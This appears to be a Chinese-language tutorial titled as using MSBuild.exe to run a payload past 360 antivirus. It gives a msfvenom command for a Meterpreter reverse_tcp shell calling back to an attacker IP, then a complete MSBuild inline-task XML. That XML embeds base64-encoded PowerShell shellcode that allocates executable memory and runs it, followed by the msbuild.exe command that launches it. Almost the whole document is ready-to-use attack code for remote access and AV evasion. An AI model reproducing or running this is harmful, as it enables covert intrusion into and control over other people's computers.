
MSBuild.exe执行payload过360


1、msfvenom生成shellcode,注意生成的是psh格式

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2lport=3333 -f psh -o shell.ps1

2、打开生成的 shell.ps1 文件,在文件最后添加

 for (;;){
       Start-sleep 60
} 

保存一下

3、将修改后的 shell.ps1 文件内容进行base64编码

可以使用在线平台(例如:https://www.sojson.com/base64.html ),也可以使用其他编码工具。

4、把编码后的内容替换到下面代码中 cmd = 处,并保存为 shell.xml

<Project ToolsVersion="4.0"
xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><!-- This inline task executes c# code. --><!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml --><!-- Original MSBuild Author: Casey Smith, Twitter: @subTee --><!-- NPS Created By: Ben Ten, Twitter: @ben0xa --><!-- License: BSD 3-Clause --><Target Name="npscsharp"><nps /></Target><UsingTaskTaskName="nps"TaskFactory="CodeTaskFactory"AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" ><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class nps : Task, ITask{
    public override bool Execute(){
    string cmd = 
"JEJGd2JBZ1RQID0gQCIKW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50 UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpOwpbRGxsSW1wb3J0KCJrZXJuZWwzM i5kbGwiKV0KcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIENyZWF0ZVRocmVhZChJbnRQdHIgbHBUaHJlYWRBdHRyaWJ1dGVzLCB1aW50IGR3U3RhY2 tTaXplLCBJbnRQdHIgbHBTdGFydEFkZHJlc3MsIEludFB0ciBscFBhcmFtZXRlciwgdWludCBkd0NyZWF0aW9uRmxhZ3MsIEludFB0ciBscFRocmVhZEl kKTsKIkAKCiRBWHJmcEp5c2NoZCA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICRCRndiQWdUUCAtTmFtZSAiV2luMzIiIC1uYW1lc3BhY2UgV2lu MzJGdW5jdGlvbnMgLXBhc3N0aHJ1CgpbQnl0ZVtdXSAkeFJYT0RmR28gPSAweGZjLDB4ZTgsMHg4ZiwweDAsMHgwLDB4MCwweDYwLDB4ODksMHhlNSwwe DMxLDB4ZDIsMHg2NCwweDhiLDB4NTIsMHgzMCwweDhiLDB4NTIsMHhjLDB4OGIsMHg1MiwweDE0LDB4ZiwweGI3LDB4NGEsMHgyNiwweDhiLDB4NzIsMH gyOCwweDMxLDB4ZmYsMHgzMSwweGMwLDB4YWMsMHgzYywweDYxLDB4N2MsMHgyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4NDksMHg 3NSwweGVmLDB4NTIsMHg1NywweDhiLDB4NTIsMHgxMCwweDhiLDB4NDIsMHgzYywweDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCww eDRjLDB4MSwweGQwLDB4OGIsMHg1OCwweDIwLDB4NTAsMHgxLDB4ZDMsMHg4YiwweDQ4LDB4MTgsMHg4NSwweGM5LDB4NzQsMHgzYywweDMxLDB4ZmYsM Hg0OSwweDhiLDB4MzQsMHg4YiwweDEsMHhkNiwweDMxLDB4YzAsMHhjMSwweGNmLDB4ZCwweGFjLDB4MSwweGM3LDB4MzgsMHhlMCwweDc1LDB4ZjQsMH gzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTAsMHg1OCwweDhiLDB4NTgsMHgyNCwweDEsMHhkMywweDY2LDB4OGIsMHhjLDB4NGIsMHg 4YiwweDU4LDB4MWMsMHgxLDB4ZDMsMHg4YiwweDQsMHg4YiwweDEsMHhkMCwweDg5LDB4NDQsMHgyNCwweDI0LDB4NWIsMHg1YiwweDYxLDB4NTksMHg1 YSwweDUxLDB4ZmYsMHhlMCwweDU4LDB4NWYsMHg1YSwweDhiLDB4MTIsMHhlOSwweDgwLDB4ZmYsMHhmZiwweGZmLDB4NWQsMHg2OCwweDMzLDB4MzIsM HgwLDB4MCwweDY4LDB4NzcsMHg3MywweDMyLDB4NWYsMHg1NCwweDY4LDB4NGMsMHg3NywweDI2LDB4NywweDg5LDB4ZTgsMHhmZiwweGQwLDB4YjgsMH g5MCwweDEsMHgwLDB4MCwweDI5LDB4YzQsMHg1NCwweDUwLDB4NjgsMHgyOSwweDgwLDB4NmIsMHgwLDB4ZmYsMHhkNSwweDZhLDB4YSwweDY4LDB4Mjc 
sMHg2OCwweDM4LDB4OGMsMHg2OCwweDIsMHgwLDB4MWIsMHhiYywweDg5LDB4ZTYsMHg1MCwweDUwLDB4NTAsMHg1MCwweDQwLDB4NTAsMHg0MCwweDUw LDB4NjgsMHhlYSwweGYsMHhkZiwweGUwLDB4ZmYsMHhkNSwweDk3LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDk5LDB4YTUsMHg3NCwweDYxLDB4Z mYsMHhkNSwweDg1LDB4YzAsMHg3NCwweGEsMHhmZiwweDRlLDB4OCwweDc1LDB4ZWMsMHhlOCwweDY3LDB4MCwweDAsMHgwLDB4NmEsMHgwLDB4NmEsMH g0LDB4NTYsMHg1NywweDY4LDB4MiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MCwweDdlLDB4MzYsMHg4YiwweDM2LDB4NmEsMHg 0MCwweDY4LDB4MCwweDEwLDB4MCwweDAsMHg1NiwweDZhLDB4MCwweDY4LDB4NTgsMHhhNCwweDUzLDB4ZTUsMHhmZiwweGQ1LDB4OTMsMHg1MywweDZh LDB4MCwweDU2LDB4NTMsMHg1NywweDY4LDB4MiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MCwweDdkLDB4MjgsMHg1OCwweDY4L DB4MCwweDQwLDB4MCwweDAsMHg2YSwweDAsMHg1MCwweDY4LDB4YiwweDJmLDB4ZiwweDMwLDB4ZmYsMHhkNSwweDU3LDB4NjgsMHg3NSwweDZlLDB4NG QsMHg2MSwweGZmLDB4ZDUsMHg1ZSwweDVlLDB4ZmYsMHhjLDB4MjQsMHhmLDB4ODUsMHg3MCwweGZmLDB4ZmYsMHhmZiwweGU5LDB4OWIsMHhmZiwweGZ mLDB4ZmYsMHgxLDB4YzMsMHgyOSwweGM2LDB4NzUsMHhjMSwweGMzLDB4YmIsMHhmMCwweGI1LDB4YTIsMHg1NiwweDZhLDB4MCwweDUzLDB4ZmYsMHhk NQoKCiRjUFBFVFdMS2hXREpCQSA9ICRBWHJmcEp5c2NoZDo6VmlydHVhbEFsbG9jKDAsW01hdGhdOjpNYXgoJHhSWE9EZkdvLkxlbmd0aCwweDEwMDApL DB4MzAwMCwweDQwKQoKW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6Q29weSgkeFJYT0RmR28sMCwkY1BQRVRXTEtoV0RKQk EsJHhSWE9EZkdvLkxlbmd0aCkKCiRBWHJmcEp5c2NoZDo6Q3JlYXRlVGhyZWFkKDAsMCwkY1BQRVRXTEtoV0RKQkEsMCwwLDApCgpmb3IgKDs7KXsKICA gU3RhcnQtc2xlZXAgNjAKfQ==";PowerShell ps = PowerShell.Create();ps.AddScript(Base64Decode(cmd));Collection<PSObject> output = null;try{
    output = ps.Invoke();}catch(Exception e){
    Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());}if (output != null){
    foreach (PSObject rtnItem in output){
    Console.WriteLine(rtnItem.ToString());}}return true;}public static string Base64Encode(string text) {
    return
System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));}public static string Base64Decode(string encodedtext) {
    return
System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));}}]]></Code></Task></UsingTask>
</Project>

5、msf设置监听

6、cmd下命令执行

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe shell.xml